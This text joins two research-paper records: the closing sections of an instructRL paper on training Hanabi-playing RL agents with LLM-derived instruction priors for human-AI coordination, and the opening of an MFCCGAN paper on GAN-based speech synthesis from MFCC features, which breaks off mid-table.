red 2 or the 1s of other colors are valid play, etc. Each player maintains five cards in their hands. They can see their partner's cards but not their own, so they need to use hints to inform their partner. Players take turns to move. In each turn, the active player can either play a card, discard a card, or hint a color/rank to their partner, which informs the recipient which cards in their hand have that specific color/rank. The game terminates if the player plays an unplayable card for 3 times or when the deck is exhausted. The final score of the team is 0 in the first case and equals to the number of cards played in the second case. The maximum score is therefore 25. The strategies in Hanabi are centered around giving hints. The game starts with 8 hint tokens. Players consume a hint token when they hint and regain a token when they discard. Therefore, they often need to discard cards at certain pace to get playable cards and also recoup hint tokens. 
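The play and scoring mechanics above are simple to state in code; the following helper is an illustrative sketch (not the benchmark implementation) of when a card is a legal play and how the final team score is computed.

```python
COLORS = ("red", "green", "blue", "yellow", "white")

def is_playable(fireworks, color, rank):
    """A card is a valid play iff it is the next rank for its colour pile.

    fireworks maps each colour to the highest rank already played (0 if none),
    so with no cards played only rank-1 cards are playable, and after a red 1
    the red 2 (or any other colour's 1) becomes playable.
    """
    return rank == fireworks[color] + 1

def team_score(fireworks, misplays):
    """Final score: 0 if three unplayable cards were played, else cards on the piles."""
    return 0 if misplays >= 3 else sum(fireworks.values())

fireworks = dict.fromkeys(COLORS, 0)
fireworks["red"] = 1                          # a red 1 has been played
print(is_playable(fireworks, "red", 2))       # True
print(is_playable(fireworks, "red", 3))       # False
print(team_score(fireworks, misplays=0))      # 1
```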
Because there are only limited copies of each card value, players need to use hint not only to tell their partner which card to play, but also which card to save. For example, if our partner is holding the only red 3 left in the game but red 3 is currently not playable, we may want to tell them the importance of this card by either hinting color red or hinting rank 3 to them. The dual purpose of the hint actions make the game challenging because they may be misinterpreted, especially when the card we want to save shares some property with other cards in the partner's hand. A common strategy that experienced players use is to designate hinting colors to indicate playable cards and hinting ranks to indicate cards that need to be saved. We refer to this as the _color-based_ policy. Alternatively, we can swap the role of hinting color and hinting rank to get a different but equally reasonable _rank-based_ policy. See Appendix B for a more intuitive illustration with a picture of an actual game. **Setup:** First, we show that instructRL can produce the two policies mentioned above with different language instructions. Specifically, we use instructRL with instruction inst\(\_\)color = "_If my partner tells me the 'color' of some of my cards, I should 'play' those specific cards. If my partner does something else, e.g. discards their card or tells me the 'rank' of my cards, then I may 'hint color' to my partner"_ to produce the color-based policy. By swapping "_rank"_ for "_color"_ and "_color"_ for "_rank"_, we get inst\(\_\)rank and use it produce the rank-based policy. We use the 175B parameter GPT-3.5 named text-davinci-003 as our LLM. \begin{table} \begin{tabular}{l l} \hline \hline Action type & Text observation example \\ \hline Null & My partner did nothing \\ Discard & My partner discarded their card at position ‘A’ \\ Play & My partner played their card at position ‘B’ \\ Hint rank & My partner told me that the rank of my card at position ‘D’ is two \\ Hint color & My partner told me that the color of my cards at positions ‘A’ and ‘C’ is red \\ \hline \hline \end{tabular} \end{table} Table 1: Examples of text observation lang\((\tau_{t}^{i})\) for partner’s all 4 types of past actions. We use position A,B,C,E,D to refer to different cards in hand with A being the oldest position. Null means that it is the beginning of the game. \begin{table} \begin{tabular}{l l} \hline \hline Action type & Language description example \\ \hline Discard & discard my card at position ‘B’ \\ Play & play my card at position ‘A’ \\ Hint rank & hint rank to my partner \\ Hint color & hint color to my partner \\ \hline \hline \end{tabular} \end{table} Table 2: Examples of language descriptions for actions lang\((a_{t})\). Note that we map all 5 hinting rank actions to the same language (same for hinting color actions). The observation in Hanabi contains lots of information such as the partner's hand, which cards have been played or discarded, previous actions, etc. It is challenging for LLMs to digest language descriptions of the entire observation. Since our instructions mainly capture the high level relationships between partner's actions and our response, we design the language description function \(\texttt{lang}(\tau_{i}^{t})\) to return the partner's last action in text. Table 1 shows examples of text observations \(\texttt{lang}(\tau_{t}^{i})\) for all types of past actions that our agent may observe. 
We use letters A, B, C, D and E instead of 1st, 2nd, 3rd, 4th and 5th to refer to different hand positions to avoid spurious correlations between card positions and ranks. Similarly, it is straightforward to convert the actions to language descriptions. Examples of \(\texttt{lang}(a_{t})\) are shown in Table 2. We combine the instruction, observation and action together using the following prompt: _Instruction:_ {inst}. _Previously:_ {lang(\(\tau_{i}^{t}\)). _Question: Should I_ {lang(\(a_{t}\))}? _Answer:_ Then we ask GPT-3.5 to predict the next token and set the logit of the action to be 1 if \(p(\text{yes})>p(\text{no})\) and 0 otherwise. The question answering style template is inspired by NLP works (Chung et al., 2022; Wei et al., 2022) that study how to prompt LLMs effectively. We pre-compute the logits for all \(\texttt{lang}(\tau_{i}^{t})\) and \(\texttt{lang}(a_{t})\) pairs and cache them before training RL. During the RL training, we compute the prior policy \(p_{\texttt{LLM}}=\texttt{Softmax}(\beta\cdot\text{logit})\) over the legal actions at each time step. The total GPT API bill for this project, including the cost for tuning the instructions and cost for additional studies in the Appendix, is roughly US$200. Note that we set the logit to 0 or 1 instead of using the actual probability of generating the action text for two reasons. First, we do not need a fine-grained prior policy from the LLM because it does not take the game rule as input and only observes limited information. The LLM prior policy only needs to provide a coarse guidance to bias the RL agent to converge to desired equilibria. Second, we do not want the RL agent to suffer from the inherent biases of the LLM because they can lead to sub-optimal outcomes. For example, under inst_rank, if previously my partner told me that the rank of my card A and C is 1, then LLM gives higher probability for yes if the action is to play card B (\(4\%\)) than if the action is to play card E, F (\(<0.01\%\)). In Appendix C, we include a more detailed analysis on the instructions by comparing the LLM predictions with a rule-based oracle in C.1. We also have robust analysis for instructRL with simpler instructions and noisy LLM priors in Appendix C.2 and C.3 respectively. We implement instructQ and instructPPO based on the open sourced repository of off-belief learning (OBL) (Hu et al., 2021). The most noteworthy implementation detail is that we train all our models by fine-tuning an OBL level 1 policy instead of training from scratch and we anneal \(\lambda\) as training progresses. The Q-learning and PPO baselines use the same setting except for \(\lambda=0\). More discussions on this and other implementation details is in Appendix A.2. **Results:** We first investigate the performance and reproducibility of instructQ and instructPPO with both color and rank instructions. From Table 3, we see that under both color and rank instructions, two instructRL variants achieve similar self-play (evaluating agents with themselves) and intra-AXP (intra-algorithm cross-play: evaluating pairs of agents trained with the same method but different seeds) scores as their vanilla counterparts. Intra-AXP is an im Figure 4: Conditional action matrix \(p(a_{t+1}|a_{t})\) for different agents. We only show most relevant action pairs for conciseness. The row values are the actions from the active player at time step \(t\). **Cr** through **Cw** correspond to the action of hinting color red, green blue yellow and white respectively. 
**R1** through **R5** correspond to the actions of hinting rank 1 through 5. The column values are the actions from the active player at time step \(t+1\). **P1** through **P5** correspond to playing the card at position 1 through 5 with 5 being the newest position. For each cell \(p_{(i,j)}\), we first count all occurrences of the action pair over 1000 games and then normalize it \(\sum_{i,j}p_{i,j}=1\). Bright yellow means high probability and dark blue means low probability. All the policies focus on playing their newest cards but they demonstrate different hinting strategies. \begin{table} \begin{tabular}{l c c} \hline \hline Method & Self-play & Intra-AXP \\ \hline Q-learning & 23.96 \(\pm\) 0.05 & 23.77 \(\pm\) 0.07 \\ InstructQ (color) & 23.78 \(\pm\) 0.05 & 23.77 \(\pm\) 0.06 \\ InstructQ (rank) & 23.92 \(\pm\) 0.02 & 23.78 \(\pm\) 0.05 \\ \hline PPO & 24.25 \(\pm\) 0.01 & 24.25 \(\pm\) 0.01 \\ InstructPPO (color) & 24.25 \(\pm\) 0.03 & 24.23 \(\pm\) 0.01 \\ InstructPPO (rank) & 24.10 \(\pm\) 0.02 & 24.08 \(\pm\) 0.02 \\ \hline \hline \end{tabular} \end{table} Table 3: Performance of different algorithms. We run 3 different seeds for each method. **Self-play**: evaluate the agents with themselves. **Intra-AXP** (intra-algorithm cross-play): evaluate pairs of agents trained with the same method but different seeds. A small gap between Intra-AXP and self-play indicates that the learning algorithm consistently converges to roughly the same solution. portant sanity check because a method is unlikely to work well for human-AI coordination if the agents trained by the method cannot coordinate with other agents trained with the same method but different seeds. The small gap between Intra-AXP and Self-play of the tested method indicates that they converge to nearly identical policies across different seeds, meeting the precondition for human-AI coordination. We then evaluate whether the policies are semantically different under different instructions and whether they satisfy the instructions. In Figure 4, we plot the conditional action matrix \(p(a_{t+1}|a_{t})\) that shows the agent's response to partner's actions marginalized over time step \(t\) in 1000 self-play games. All agents focus on hinting and playing the 5th (newest) card. The vanilla Q-learning agent uses a mixture of both color and rank hints to indicate playable cards. For instructQ and instructPPO, however, the agents heavily bias towards using the type of hints that they are instructed to use. This evidence alone is not sufficient to conclude that the agents' policies satisfy their instructions because the card played may have nothing to do with the hints. In Figure 5, we check what kind of knowledge the agents have on the cards being played when they play a card. All agents primarily (\(\geq 98\%\) of the time) play cards that they have knowledge about. The instruct agents rely significantly more on the type of hints that the instructions tell them to use. Videos of the games played by instructRL agents are available on the website for more intuitive illustration of different policies. **Human evaluation:** We ask 10 humans to evaluate the instructQ agents and the Q-learning baseline. Each participant plays with the Q-learning agent (_Q-learning_), one of the instructQ (color) or instructQ (rank) agent without seeing the corresponding language instructions (_instructQ w/o L_), and the remaining instructQ agent after seeing the instruction that it is trained to follow _(instructQ with L)_. The results are shown in Table 4. 
Without knowing the language, two instructQ agents get comparable results with the Q-learning baseline. However, when the language instructions are shown to the human partners, they achieve significantly higher scores and lose only 1 out of 10 games due to failed coordination. For the instructQ with language setting, we also ask the user two questions using 7-point Likert scale: 1) _On the high level, the bot's strategy satisfies its instruction mentioned above._ 2) _The language instruction helps me better collaborate with the bot._ and the scores are 6.00 \(\pm\) 0.24 and 6.20 \(\pm\) 0.31 respectively. The results not only demonstrate that instructRL produces semantically different policies that follow the instructions, but also verify our observation that language communication is tremendously beneficial in human-AI coordination. We also ask additional questions for all agents (shown in Figure 6) and the results also confirm that knowing the instructions make the coordination experience much better. Although the policies behind the orange and green bars are the same, humans think they are easier to understand, more predictable and trustworthy after seeing the language. **Additional experiments on robustness and test-time adaptation:** In Appendix C, we include additional experiments on the robustness of instructRL where we show that instructRL works well with less perfect prior policies generated with simpler, less prompt-engineered instructions. We also study how the performance deteriorates as we ran \begin{table} \begin{tabular}{l c c} \hline \hline Method & Score & Game lost \\ \hline Q-learning & 9.80 \(\pm\) 3.35 & 5/10 \\ InstructQ w/o L & 7.80 \(\pm\) 3.23 & 6/10 \\ InstructQ with L & **18.70 \(\pm\) 2.18** & **1/10** \\ \hline \hline \end{tabular} \end{table} Table 4: Human evaluation results. Each player plays with the Q-learning agent, one of the instructQ agent without knowing its language instruction and the other instructQ agent knowing its language instruction in _random order_. **Score** shows mean \(\pm\) standard error. **Game lost** shows how many games are terminated because all 3 lives are lost. Figure 5: Knowledge of cards when the agent plays those cards. The knowledge of the cards is either revealed by hints or inferred public knowledge such as counting the remaining cards. **Only color**: player knows the color but not the rank. **Only rank**: player knows the rank but not the color. **Both**: player knows exactly what the card is. **None**: player knows nothing about this card. Figure 6: Human feedback on 3 subjective questions. The conclusion is consistent with that from the actual scores. Knowing the language instructions significantly improves the humans’ experience when coordinate with the agents. domly corrupt the LLM prior. In Appendix D we show that adding the LLM prior to the fixed Q-learning agents decreases the self-play performance of the agents while brings little improvement on their coordination performance with the corresponding instructQ agents, which encourages more future works along the line of _test-time_ adaption with language instructions. ## 6 Conclusions In this paper we present instructRL, a framework for better human-AI coordination by training RL agents to follow natural language instructions that specify how the human would like to coordinate with AI. 
Instead of collecting labeled human data, we achieve this goal by using LLMs to construct a prior policy conditioned on the instruction and using it to regularize RL to converge to the most desirable equilibria. Through both qualitative analysis and human evaluations, we show that instructRL converges to policies that satisfy the language instruction, and that humans can coordinate with RL agents much better if they are given the associated instructions used to train the agents. There are many exciting future directions, such as the problem of test-time adaptation with language instructions detailed in Appendix D. As LLMs become more powerful, it will also be interesting to extend this work with more fine-grained instructions or enable users to specify instructions in more flexible ways, such as human-AI dialogues. ## 7 Acknowledgments We would like to thank the participants of the Hanabi human evaluation for playing with our agents. We also thank the members of the Stanford ILIAD lab for their support and feedback during the development of this project, and thank Samuel Sokota for discussions on different regularization techniques. This work was supported by a JP Morgan Faculty Award, DARPA YFA, AFOSR, ONR and NSF Awards #2006388 and #2125511.
2306.12785
MFCCGAN: A Novel MFCC-Based Speech Synthesizer Using Adversarial Learning
In this paper, we introduce MFCCGAN as a novel speech synthesizer based on adversarial learning that adopts MFCCs as input and generates raw speech waveforms. Benefiting the GAN model capabilities, it produces speech with higher intelligibility than a rule-based MFCC-based speech synthesizer WORLD. We evaluated the model based on a popular intrusive objective speech intelligibility measure (STOI) and quality (NISQA score). Experimental results show that our proposed system outperforms Librosa MFCC- inversion (by an increase of about 26% up to 53% in STOI and 16% up to 78% in NISQA score) and a rise of about 10% in intelligibility and about 4% in naturalness in comparison with conventional rule-based vocoder WORLD that used in the CycleGAN-VC family. However, WORLD needs additional data like F0. Finally, using perceptual loss in discriminators based on STOI could improve the quality more. WebMUSHRA-based subjective tests also show the quality of the proposed approach.
Mohammad Reza Hasanabadi Majid Behdad Davood Gharavian
2023-06-22T10:29:24Z
http://arxiv.org/abs/2306.12785v1
# MFCCGAN: A Novel MFCC-Based Speech Synthesizer Using Adversarial Learning ###### Abstract In this paper, we introduce MFCCGAN as a novel speech synthesizer based on adversarial learning that adopts MFCCs as input and generates raw speech waveforms. Benefiting the GAN model capabilities, it produces speech with higher intelligibility than a rule-based MFCC-based speech synthesizer WORLD. We evaluated the model based on a popular intrusive objective speech intelligibility measure (STOI) and quality (NISQA score). Experimental results show that our proposed system outperforms Librosa MFCC-inversion (by an increase of about 26% up to 53% in STOI and 16% up to 78% in NISQA score) and a rise of about 10% in intelligibility and about 4% in naturalness in comparison with conventional rule-based vocoder WORLD that used in the CycleGAN-VC family. However, WORLD needs additional data like F0. Finally, using perceptual loss in discriminators based on STOI could improve the quality more. WebMUSHRA-based subjective tests also show the quality of the proposed approach. Mohammad Reza Hasanabadi, Majid Behdad, Davood Gharavian Shahid Beheshti University, Tehran, Iran, {m_hasanabadi, m_behdad, d_gharavian}@sbu.ac.ir **Index Terms**- MFCC feature inversion, speech coding, speech synthesis, generative adversarial learning, perceptual optimization ## 1 Introduction Signal reconstruction is an important part of almost any system containing synthesizers [1, 2] such as coding [3], text-to-speech [4], speech enhancement [5], and voice conversion systems [6]. In some cases, having features extracted and processed, recovering the original signal for posterior use is challenging. Since some feature extraction methods use nonlinear transforms, getting the signal back is not as easy as feature extraction. The limitation of bandwidth constrains the functionality of such systems. Quality and bitrate (available bandwidth) are relevant attributes that usually happen together. Often, the more the bit rate you dedicate, the more quality you get. However, available bandwidth is usually a big challenge to deal with. In such conditions, finding codecs capable to improve quality and decrease bandwidth simultaneously is of great importance. So far, communication systems incorporate several kinds of audio codecs depending on complexity, latency, bandwidth needed, and quality [7]. Most domestic PSTN centers operate at an 8 kHz sampling rate and 8-bit non-linear quantization according to ITU-T G.711, which results in 64 kbps encoding. GSM family including Full Rate (GSM-FR), Half Rate (HR), and Enhanced Full Rate (EFR), were among the first digital speech coding standards introduced to use in GSM (Global System for Mobile Communication). They operate at an average bit rate of 13 kbps, 5.6 kbps, and 12.2 kbps respectively [7]. Albeit GSM-EFR consumes less bandwidth in comparison with FR, it provides better speech quality and robustness in facing network impairments. MELPe (Mixed-Excitation Linear Predictive) vocoder algorithm, which operates at both 1.2 and 2.4 kbps is a very low-bit rate codec selected by the United States Department of Defense [8, 9]. Speex [10] is another audio compression suitable to handle VoIP and internet audio streaming. Based on the CELP algorithm [11], it operates at bit rates ranging from 2.2 to 44 kbps. Changing bit rate dynamically makes Speex among the few codecs providing Variable Bit-Rate (VBR). 
While traditional rule-based methods often fail to recover signals from their features due to nonlinearities in the extraction process, learning-based approaches provide a framework to reconstruct signals from features more faithfully. Big data availability facilitates learning complex models. Deep neural networks play an important role in modeling complex and nonlinear behaviors. Convolutional Neural Networks (CNN), Variational Auto Encoders (VAE), and Generative Adversarial Networks (GAN) are important classes of deep learning models. These classes apply to various fields of speech processing such as speech recognition, synthesis, coding, voice conversion, and so on. Van den Oord et al. introduced WaveNet [13], a deep neural network for generating raw audio waveforms. It is an autoregressive generative model, which predicts each output audio sample conditioned on some previous ones. WaveNet is based on PixelCNN, which was first introduced for image generation [14]. Although WaveNet is usually applied for text-to-speech purposes, it can be adapted to coding applications. W. Bastiaan Kleijn et al. [15] showed that WaveNet can generate high-quality speech from a 2.4 kbps bit stream. C. Garbacea et al. also combined WaveNet and VQVAE [16] to produce low-bit-rate speech coding. WaveGlow is another decoder that generates high-quality speech from Mel-spectrograms without the need for autoregression [17]. LPCNet [18], a WaveRNN [19] variant, combines linear prediction with recurrent neural networks to improve the efficiency of speech synthesis. Autoregressive models, such as WaveNet, model local structure well but suffer from slow iterative sampling and lack global latent structure. In contrast, Generative Adversarial Networks (GANs) have global latent conditioning and efficient parallel sampling [20]. MelGAN is a non-autoregressive feedforward convolutional architecture that performs audio waveform generation in a GAN setup [2]. It was almost the first work on reconstructing raw audio from Mel-spectrograms. Because it is non-autoregressive, it is fast and well suited as an alternative to autoregressive models [2]. This paper presents a GAN-based architecture to generate raw waveforms based on MFCC features (MFCCGAN). MFCCs can be considered good candidate features for coding systems. Besides coding, CycleGAN-VC1/VC2 [21, 22] use MFCCs as conversion features for voice conversion based on the WORLD vocoder [23]. Therefore, better methods for MFCC inversion with higher quality and intelligibility could also be useful for improving the quality of this family of voice conversion systems. In the following sections, we briefly review MFCC features in Section 2 and then introduce our proposed GAN-based network in Section 3. We investigate perceptual optimization in Section 4, experimental results in Section 5, and coding applications in Section 6, and finally suggest some future research directions besides the conclusion in Section 7. 1 Footnote 1: _Source code is available at [https://github.com/MohammadReza2020/infccgan_](https://github.com/MohammadReza2020/infccgan_) ## 2 Mel-Frequency Cepstral Coefficients Mel-Frequency Cepstral Coefficients (MFCC) [24, 25] are among the state-of-the-art features in many speech processing systems. MFCCs are commonly used in speech recognition systems, which aim to detect the linguistic content of speech. MFCC is also used in music information retrieval applications such as genre classification [27], audio similarity measurements, etc. 
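For readers who want to reproduce the input pipeline, the sketch below shows MFCC extraction with librosa, the tool the paper itself uses to prepare its inputs (see Section 5). The sample rate, hop length, and coefficient counts are illustrative assumptions, not settings reported by the authors.

```python
# Minimal MFCC extraction sketch with librosa (assumed parameter values).
import librosa

def extract_mfcc(wav_path, sr=22050, n_mfcc=36, n_mels=128, hop_length=256):
    # Load the utterance and compute MFCCs (Mel filterbank -> log -> DCT).
    y, sr = librosa.load(wav_path, sr=sr)
    mfcc = librosa.feature.mfcc(y=y, sr=sr, n_mfcc=n_mfcc,
                                n_mels=n_mels, hop_length=hop_length)
    return mfcc  # shape: (n_mfcc, n_frames)
```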
The Discrete Cosine Transform (DCT) is the key element in MFCC computation for transforming the input utterance into the output acoustic sequence. Since the MFCC algorithm applies operators such as the DCT, logarithmic compression, and Mel scaling to extract the coefficients, and discards much information through a low-rank projection of the Mel-spectrum, reconstructing the signal back from its MFCC features is challenging. On the other hand, MFCCs are engineered for other speech tasks such as automatic speech recognition (ASR) [28] and speaker verification (ASV) [29]. Several attempts have been made at MFCC-inversion, e.g., [30]. The results of these works are noteworthy, but they follow complicated structures and use many modules, which increases complexity and imposes high computation costs, e.g., [30]. As an example, an MFCC representation with n_mel=128 and n_mfcc=40 is analogous to a JPEG image with the quality set to 30% [31]. Simple reconstructions often lead to hissing sounds. Therefore, we propose to learn the conversion process through a deep neural network with a simple model, without any extra modules, to generate a more natural time-domain raw waveform. We use an adversarial setup introduced in [2], conditioned on MFCC features as input, and call it MFCCGAN. Since adversarial models represent an implicit distribution density, such models are less exposed to over-smoothing, which is a common challenge in speech tasks such as coding, synthesis, and conversion. In the following, we investigate each part of the architecture. ## 3 Network Architecture ### Generator The generator of the MFCCGAN speech synthesizer is a fully convolutional network. A stack of transposed convolutional layers is used to upsample the input MFCC from 256x lower temporal resolution to a raw waveform. Following each convolutional layer, a block of residual layers with a dilation attribute is added. Dilation leads to a greater receptive field over the input, which helps model the variations better. The upsampling is applied in four stages: two 8x and two 2x resolution increases. A 1D transposed convolution operator is applied in each stage to increase the resolution. Residual stacks do not change the input size. Each residual stack consists of three convolutional layers with different dilation parameters. As mentioned earlier, these stacks look at the input with a greater receptive field with the aid of dilation. Table 1 shows the specifications of each layer of the generator in sequence. ### Discriminator An important feature of the discriminator is its multi-scale architecture containing three identical discriminators, which operate on different audio scales (sampling rates). Downsampling a signal to a lower resolution lets us look at the signal with different frequency resolutions: higher-frequency behavior shows up more at higher scales, while a lower sampling rate reflects the low-frequency behavior. Therefore, scoring the output signal at three levels can lead to better judgment of its quality. The downsampling process inside each discriminator is done using convolutional layers only; no pooling is adopted in the discriminators except on the input sequence. The structure of all three discriminators is identical, so only the attribute details of discriminator I are provided in Table 2. The attributes of each convolution layer of the discriminators, such as kernel, stride, padding, and dilation, are adjusted so that the downsampled output signal of each discriminator is according to Table 3. 
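The following is a minimal PyTorch sketch of the generator topology described above: a 256x upsampler built from four transposed-convolution stages (8x, 8x, 2x, 2x), each followed by a dilated residual stack. Channel widths, kernel sizes, and the dilation pattern (1, 3, 9) are assumptions in the spirit of Table 1 and the MelGAN design [2], not the exact published configuration.

```python
import torch
import torch.nn as nn

class ResidualStack(nn.Module):
    # Three dilated convolutional blocks with residual connections (Sec. 3.1).
    def __init__(self, ch):
        super().__init__()
        self.blocks = nn.ModuleList([
            nn.Sequential(
                nn.LeakyReLU(0.2),
                nn.Conv1d(ch, ch, kernel_size=3, dilation=d, padding=d),
                nn.LeakyReLU(0.2),
                nn.Conv1d(ch, ch, kernel_size=1),
            )
            for d in (1, 3, 9)   # assumed dilation pattern
        ])

    def forward(self, x):
        for block in self.blocks:
            x = x + block(x)     # residual connection keeps the temporal size
        return x

class Generator(nn.Module):
    # MFCC frames (n_mfcc x T) -> raw waveform (1 x 256T): 8x * 8x * 2x * 2x = 256x.
    def __init__(self, n_mfcc=36, base_ch=512):
        super().__init__()
        layers = [nn.Conv1d(n_mfcc, base_ch, kernel_size=7, padding=3)]
        ch = base_ch
        for r in (8, 8, 2, 2):
            layers += [
                nn.LeakyReLU(0.2),
                nn.ConvTranspose1d(ch, ch // 2, kernel_size=2 * r, stride=r, padding=r // 2),
                ResidualStack(ch // 2),
            ]
            ch //= 2
        layers += [nn.LeakyReLU(0.2), nn.Conv1d(ch, 1, kernel_size=7, padding=3), nn.Tanh()]
        self.net = nn.Sequential(*layers)

    def forward(self, mfcc):
        return self.net(mfcc)

# Example: Generator(n_mfcc=36)(torch.randn(1, 36, 32)) -> waveform of shape (1, 1, 8192).
```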
### Training objective Inspired by [2], we use the Least Squares GAN [32] with equations (1) to (4) as objective functions:

\[L_{D_{k}}=\min_{D_{k}}\left(\mathbb{E}_{x}\left[\left(1-D_{k}(x)\right)^{2}\right]+\mathbb{E}_{s}\left[\left(0-D_{k}(G(s))\right)^{2}\right]\right),\quad\forall k=1,2,3 \tag{1}\]

\[L_{G}^{adv}=\min_{G}\ \mathbb{E}_{s}\left[\sum_{k=1,2,3}\left(1-D_{k}(G(s))\right)^{2}\right] \tag{2}\]

\[L_{FM}(G,D_{k})=\mathbb{E}_{x,s\sim p_{\text{data}}}\left[\sum_{i=1}^{T}\frac{1}{N_{i}}\left\|D_{k}^{(i)}(x)-D_{k}^{(i)}(G(s))\right\|_{1}\right] \tag{3}\]

\[L_{G}=\min_{G}\left(\mathbb{E}_{s}\left[\sum_{k=1,2,3}\left(1-D_{k}(G(s))\right)^{2}\right]+\lambda\sum_{k=1,2,3}L_{FM}(G,D_{k})\right) \tag{4}\]

Equation (1) pushes the three discriminators to discriminate strictly between real and fake (reconstructed) data. On the other hand, (2) drives the generator to generate raw waveforms similar to the real data, in order to fool the discriminator. Since GAN networks are prone to mode collapse, we also utilize an extra loss function \(L_{FM}\), named feature matching [2], given in (3), to trace the status of training. Each discriminator outputs feature maps at its consecutive layers with different time resolutions; these extra features are used to form the feature matching loss between original and predicted samples, where \(D_{k}^{(i)}\) denotes the \(i\)-th layer feature map of discriminator \(k\) and \(N_{i}\) its number of units. The final objective of the generator is then given by (4). ## 4 Perceptual Optimization Using STOI To further increase the quality of the synthesized speech, inspired by MetricGAN [33], we force the discriminators to learn to judge between real and fake data based on a perceptual intelligibility metric, STOI [34]. Therefore, we calculate STOI between real and fake training utterances in each batch and substitute it for the zero target in (1). We thus use (5) as a novel perceptual loss function instead of (1) in the discriminators to increase the intelligibility of the generated utterances; experimental results verified this idea:

\[L_{D_{k}}=\min_{D_{k}}\left(\mathbb{E}_{x}\left[\left(1-D_{k}(x)\right)^{2}\right]+\mathbb{E}_{s}\left[\left(STOI(x,G(s))-D_{k}(G(s))\right)^{2}\right]\right),\quad\forall k=1,2,3 \tag{5}\]

## 5 Experimental Results To evaluate the proposed idea, we carried out two categories of assessments: objective and subjective tests. For the objective test, we selected the short-time objective intelligibility (STOI) measure, which is a popular metric for the assessment of speech intelligibility [33]. There are different aspects of speech quality, and among them, intelligibility and naturalness are the most important. The STOI metric has a higher correlation with subjective listening tests than simple L1 or L2, SNR, segmental SNR, and many other measures [33]. Therefore, this metric is a good choice for the performance assessment of our proposed system, because the reconstructed and reference speech signals are time-aligned. We have also used a new no-reference objective naturalness assessment representing subjective scores, called NISQA [35]. The NISQA tool is a five-scale (0-5), neural-based, and non-intrusive objective quality measure for assessing naturalness. This version of NISQA (NISQA-TTS) is trained end-to-end, and the time-dependency modeling and time-pooling are achieved through a Self-Attention mechanism customized for TTS applications. Besides the full-reference and no-reference objective tests, we carried out a simplified crowdsourced subjective test using WebMUSHRA [36]. In this experiment, we used the LJSpeech dataset [37] to prepare the sample speech utterances for the training, validation, and test sets. 
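Returning briefly to the objectives above, the sketch below shows one way equations (1)-(5) can be computed in practice. The interfaces (per-scale discriminator outputs `d_outs_*`, per-layer feature maps `feats_*`) and the weight `lam` are assumed conventions (`lam=10` is the MelGAN default), not code from the paper; substituting the batch STOI score for the zero target reproduces the perceptual variant of Eq. (5).

```python
import torch
import torch.nn.functional as F

def discriminator_loss(d_outs_real, d_outs_fake, stoi_score=None):
    # LSGAN targets: 1 for real, 0 for fake (Eq. 1). Replacing the fake target 0
    # with the batch STOI score gives the perceptual variant of Eq. (5).
    fake_target = 0.0 if stoi_score is None else stoi_score
    loss = 0.0
    for real, fake in zip(d_outs_real, d_outs_fake):   # one term per scale k = 1, 2, 3
        loss = loss + ((1.0 - real) ** 2).mean() + ((fake_target - fake) ** 2).mean()
    return loss

def generator_loss(d_outs_fake, feats_real, feats_fake, lam=10.0):
    # Adversarial term (Eq. 2) plus feature-matching term (Eq. 3), combined as in Eq. (4).
    adv = sum(((1.0 - fake) ** 2).mean() for fake in d_outs_fake)
    fm = 0.0
    for fr_scale, ff_scale in zip(feats_real, feats_fake):   # per discriminator scale
        for fr, ff in zip(fr_scale, ff_scale):               # per intermediate layer
            fm = fm + F.l1_loss(ff, fr.detach())
    return adv + lam * fm
```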
We used 13000 utterances of the LJSpeech dataset to train the model and 100 (non-overlapping) utterances to evaluate our proposed method for MFCC-inversion. We used the STOI and NISQA measures for assessing and comparing the intelligibility of our proposed system outputs with the results of a rule-based MFCC-inversion tool, WORLD, as a strong reference system: a high-quality vocoder widely regarded as a state-of-the-art model in SPSS [38]. To consider the dimensionality of the MFCC features, we investigated different numbers of MFCCs. Table 4 shows the final results in terms of the STOI measure, which is defined in a one-third octave band domain. As illustrated, the STOI score averaged over the 100 utterances reconstructed by our proposed system is significantly higher than that of the conventional rule-based MFCC-inversion of WORLD (about 10% higher). For these experiments, we used 36 MFCC coefficients for inversion in the GAN-based architecture and also for the traditional WORLD MFCC-inversion. Although WORLD needs further data such as the fundamental frequency and a voiced/unvoiced decision procedure, our proposed method attains higher quality in terms of objective tests. As a reference, we also measured and noted in Table 4 the STOI of speech synthesized with MelGAN from 80 Mel-spectrogram coefficients. According to this table, at least a 4% increase in the NISQA score can be inferred.

\begin{table}
\begin{tabular}{|c|c|c|c|c|c|c|c|c|c|}
\hline No. & Layer & Input-size & In-channel & Out-channel & Kernel & Stride & Padding & Dilation & Output-size \\
\hline 1 & Conv1d & N\(\times\)39\(\times\)32* & 80 & 512 & 7 & 1 & 0 & 1 & N\(\times\)512\(\times\)32 \\
\hline 2 & Conv1d transpose (8x) & N\(\times\)512\(\times\)32 & 512 & 256 & 16 & 8 & 4 & 1 & N\(\times\)256\(\times\)256 \\
\hline 3 & Residual stack & N\(\times\)256\(\times\)256 & 256 & 256 & 1, 3 & 1 & 0 & 1, 3, 9 & N\(\times\)256\(\times\)256 \\
\hline 4 & Conv1d transpose (8x) & N\(\times\)256\(\times\)256 & 256 & 128 & 16 & 8 & 4 & 1 & N\(\times\)128\(\times\)2048 \\
\hline 5 & Residual stack & N\(\times\)128\(\times\)2048 & 128 & 128 & 1, 3 & 1 & 0 & 1, 3, 9 & N\(\times\)128\(\times\)2048 \\
\hline 6 & Conv1d transpose (2x) & N\(\times\)128\(\times\)2048 & 128 & 64 & 4 & 2 & 1 & 1 & N\(\times\)64\(\times\)4096 \\
\hline 7 & Residual stack & N\(\times\)64\(\times\)4096 & 64 & 64 & 1, 3 & 1 & 0 & 1, 3, 9 & N\(\times\)64\(\times\)4096 \\
\hline 8 & Conv1d transpose (2x) & N\(\times\)64\(\times\)4096 & 64 & 32 & 4 & 2 & 1 & 1 & N\(\times\)32\(\times\)8192 \\
\hline 9 & Residual stack & N\(\times\)32\(\times\)8192 & 32 & 32 & 1, 3 & 1 & 0 & 1, 3, 9 & N\(\times\)32\(\times\)8192 \\
\hline 10 & Conv1d & N\(\times\)32\(\times\)8192 & 32 & 1 & 7 & 1 & 0 & 1 & N\(\times\)1\(\times\)8192 \\
\hline \multicolumn{10}{l}{* N indicates the batch size.} \\
\end{tabular}
\end{table} Table 1: Specifications of each layer of the Generator in sequence

\begin{table}
\begin{tabular}{|c|c|c|c|c|c|c|c|c|c|}
\hline No. & Layer & Input-size & In-channel & Out-channel & Kernel & Stride & Padding & Dilation & Output-size \\
\hline 0 & input & N\(\times\)1\(\times\)8192 & 1 & 1 & - & - & - & - & N\(\times\)1\(\times\)8206 \\
